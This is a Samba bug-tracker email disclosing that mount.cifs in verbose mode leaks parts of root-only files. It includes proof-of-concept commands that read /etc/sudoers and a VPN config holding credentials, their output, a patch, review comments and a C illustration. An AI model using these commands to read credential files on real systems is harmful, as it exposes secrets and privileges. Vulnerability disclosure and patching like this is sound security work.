From: samba-bugs@samba.org
To: cifs-qa@samba.org
Subject: [Bug 15026] New: Partial arbitrary file read via mount.cifs
Date: Mon, 21 Mar 2022 11:03:53 +0000
Message-ID: <bug-15026-10630@https.bugzilla.samba.org/>
https://bugzilla.samba.org/show_bug.cgi?id=15026
Bug ID: 15026
Summary: Partial arbitrary file read via mount.cifs
Product: CifsVFS
Version: 5.x
Hardware: All
OS: All
Status: NEW
Severity: normal
Priority: P5
Component: user space tools
Assignee: jlayton@samba.org
Reporter: jbe@improsec.com
QA Contact: cifs-qa@samba.org
CC: sfrench@samba.org
Target Milestone: ---
Partial arbitrary file read via mount.cifs
The following was tested on cifs-utils version 6.14.
The "credentials" option of the mount.cifs binary allows for partial arbitrary
file disclosure when the verbose flag is set. When a credential line is invalid,
the following code is reached:
static int open_cred_file(char *file_name,
                          struct parsed_mount_info *parsed_info)
{
...
        case CRED_UNPARSEABLE:
                if (parsed_info->verboseflag)
                        fprintf(stderr, "Credential formatted "
                                "incorrectly: %s\n",
                                temp_val ? temp_val : "(null)");
Because of how credential files are formatted, any part of a line after an
equal sign in an invalid line is printed. Such lines can be found in sensitive
files:
secure_path and rights in /etc/sudoers:
$ ls -l /etc/sudoers
-r--r----- 1 root root 670 Apr 20 2021 /etc/sudoers
$ sudo /usr/sbin/mount.cifs -v //127.0.0.1/share /mnt/share -o credentials=/etc/sudoers
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (ALL:ALL) ALL
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (ALL:ALL) ALL
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Password for root@//127.0.0.1/share:
mount.cifs kernel mount options: ip=127.0.0.1,unc=\\127.0.0.1\share,user=root,pass=********
mount error(111): could not connect to 127.0.0.1Unable to find suitable address.
Passwords in /etc/openfortivpn/config:
$ ls -l /etc/openfortivpn/config
-rw------- 1 root root 154 Aug 28 2021 /etc/openfortivpn/config
$ sudo /usr/sbin/mount.cifs -v //127.0.0.1/share /mnt/share -o credentials=/etc/openfortivpn/config
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: vpn.example.org
Credential formatted incorrectly: 443
Credential formatted incorrectly: vpnuser
Credential formatted incorrectly: VPNpassw0rd
Password for root@//127.0.0.1/share:
mount.cifs kernel mount options: ip=127.0.0.1,unc=\\127.0.0.1\share,user=root,pass=********
mount error(111): could not connect to 127.0.0.1Unable to find suitable address.
Note that either sudo rights on the mount.cifs binary or an entry in fstab are
needed to perform the read.
A possible mitigation is to get rid of the token value when printing the error
in verbose mode:
From: Jeffrey Bencteux <jbe@improsec.com>
Date: Sat, 19 Mar 2022 13:41:15 -0400
Subject: [PATCH] fix verbose message of credentials option
When a supposed credential line is invalid, the verbose message prints
part of it. This leads to information disclosure when the
credentials file given is sensitive and contains '=' signs.
Signed-off-by: Jeffrey Bencteux <jbe@improsec.com>
---
mount.cifs.c | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/mount.cifs.c b/mount.cifs.c
index 32521a7..82358a3 100644
--- a/mount.cifs.c
+++ b/mount.cifs.c
@@ -637,8 +637,7 @@ static int open_cred_file(char *file_name,
case CRED_UNPARSEABLE:
if (parsed_info->verboseflag)
fprintf(stderr, "Credential formatted "
- "incorrectly: %s\n",
- temp_val ? temp_val : "(null)");
+ "incorrectly\n");
break;
}
}
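Review bot: The replacement fprintf in the CRED_UNPARSEABLE case no longer tells the user which line of the credentials file was rejected, so a genuine typo in a real credentials file becomes harder to locate. Printing a line counter instead of temp_val would identify the line without echoing any bytes read from the file. Separately, the break after the message lets parsing continue, and the terminal output in the report shows one message per rejected line followed by the password prompt, so a file that is not a credentials file is still read to the end; it is worth confirming that this is intended.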
--
2.33.0
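The behaviour described in the report, reduced to a self-contained model (an added example, not code from cifs-utils or from the reporter). The names parse_line and scan_creds, the accepted key names and the sample file are assumptions made for illustration; the example contrasts a diagnostic that echoes the value with one that prints only a line number.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample: a config file that is not a credentials file. */
static const char SAMPLE[] = "# constructed example\n"
    "endpoint=vpn.example.org\n" "api_token=Constructed-Secret\n";

/* Simplified key=value parser, NOT cifs-utils code; the accepted key names
 * are assumptions. Returns 1 if the line is a known credential, else 0. */
static int parse_line(char *line, char **value)
{
    char *eq = strchr(line, '=');

    *value = eq ? eq + 1 : NULL;        /* text after the first '=' */
    if (eq == NULL) return 0;           /* no '=': rejected, value is NULL */
    *eq = '\0';
    return !strcmp(line, "username") || !strcmp(line, "password") ||
           !strcmp(line, "domain");     /* unknown key: rejected */
}

/* Writes one verbose diagnostic per rejected line into out (cap > 0).
 * leaky != 0 echoes the value, as in the report; leaky == 0 prints only the
 * line number. Returns the number of rejected lines; stops if out fills. */
static int scan_creds(const char *text, int leaky, char *out, size_t cap)
{
    char line[256], *value;
    size_t used = 0, lineno = 0;
    int n, rejected = 0;

    out[0] = '\0';
    while (*text) {
        size_t len = strcspn(text, "\n");
        snprintf(line, sizeof(line), "%.*s", (int)len, text);
        text += len + (text[len] == '\n');
        lineno++;
        if (parse_line(line, &value)) continue;
        rejected++;
        n = leaky ? snprintf(out + used, cap - used, "Credential formatted "
                             "incorrectly: %s\n", value ? value : "(null)")
                  : snprintf(out + used, cap - used, "Credential formatted "
                             "incorrectly (line %zu)\n", lineno);
        if (n < 0 || (size_t)n >= cap - used) break;
        used += (size_t)n;
    }
    return rejected;
}

int main(void)
{
    char out[512];
    scan_creds(SAMPLE, 1, out, sizeof(out)); printf("leaky:\n%s", out);
    scan_creds(SAMPLE, 0, out, sizeof(out)); printf("number only:\n%s", out);
    return 0;
}
```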